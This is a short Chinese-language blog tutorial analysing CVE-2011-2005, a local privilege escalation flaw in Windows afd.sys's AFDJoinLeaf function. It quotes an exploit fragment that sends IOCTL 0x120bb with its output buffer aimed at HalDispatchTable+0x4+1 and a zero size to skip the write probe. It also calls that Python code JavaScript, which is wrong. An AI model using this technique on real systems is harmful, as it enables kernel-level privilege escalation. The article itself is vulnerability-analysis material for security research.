当前位置：首页 > 文章列表 > 文章 > 软件教程 > CVE-2011-2005：揭秘WindowsAfd.sys本地提权漏洞

CVE-2011-2005：揭秘WindowsAfd.sys本地提权漏洞

2025-05-16 11:01:20 0浏览收藏

CVE-2011-2005揭示了Microsoft Windows Afd.sys中的一个严重漏洞，具体涉及到AFDJoinLeaf函数的本地提权问题。本文详细分析了如何利用JavaScript编写的代码触发AFDJoinLeaf函数的指针覆盖，从而实现漏洞利用。通过对Windows XP版本的afd.sys进行分析，并使用IDA 6.8工具跟踪函数，我们发现了在特定条件下可以进行任意地址写入的漏洞利用机会。文章还讨论了漏洞修复的关键步骤，即直接检测UserBuffer的有效性。本文旨在帮助读者理解漏洞利用和修复的完整过程，为安全研究提供参考。

在讨论如何利用代码定位和分析漏洞函数时，我们可以从给定的示例中学习如何识别和利用AFDJoinLeaf函数中的漏洞。以下是对该过程的详细分析和伪原创处理：

在利用代码定位和分析漏洞函数时，我们需要深入理解特定的漏洞利用方式。本文以CVE-2011-2005为例，详细探讨如何利用Microsoft Windows Afd.sys中的AFDJoinLeaf函数实现本地提权。

首先，我们需要了解环境设置和利用代码。给定的exp链接（https://www.exploit-db.com/exploits/18176/）展示了对AFDJoinLeaf函数的利用。该代码是用JavaScript编写的，旨在触发AFDJoinLeaf函数的指针覆盖：

## 触发AFDJoinLeaf指针覆盖
print "[*] 触发AFDJoinLeaf指针覆盖..."
IOCTL             = 0x000120bb                # AFDJoinLeaf
inputbuffer       = 0x1004
inputbuffer_size  = 0x108
outputbuffer_size = 0x0                       # 绕过写入探测
outputbuffer      = HalDispatchTable0x4 + 0x1 # HalDispatchTable+0x4+1
IoStatusBlock = c_ulong()
NTSTATUS = ntdll.ZwDeviceIoControlFile(client,
                                       None,
                                       None,
                                       None,
                                       byref(IoStatusBlock),
                                       IOCTL,
                                       inputbuffer,
                                       inputbuffer_size,
                                       outputbuffer,
                                       outputbuffer_size
                                       )

在实际操作中，我们发现Windows 7的afd.sys中没有AFDJoinLeaf函数，因此我们选择使用Windows XP的版本进行分析。使用IDA 6.8而不是IDA 7.0更有助于查看函数名。

通过在IDA的函数窗口中搜索AFDJoinLeaf，并跟踪到该函数，我们发现只有当长度（length）不为0时，代码才会检查UserBuffer。这为我们提供了任意地址写入的漏洞利用机会。

CVE-2011-2005-Microsoft Windows Afd.sys 本地提权漏洞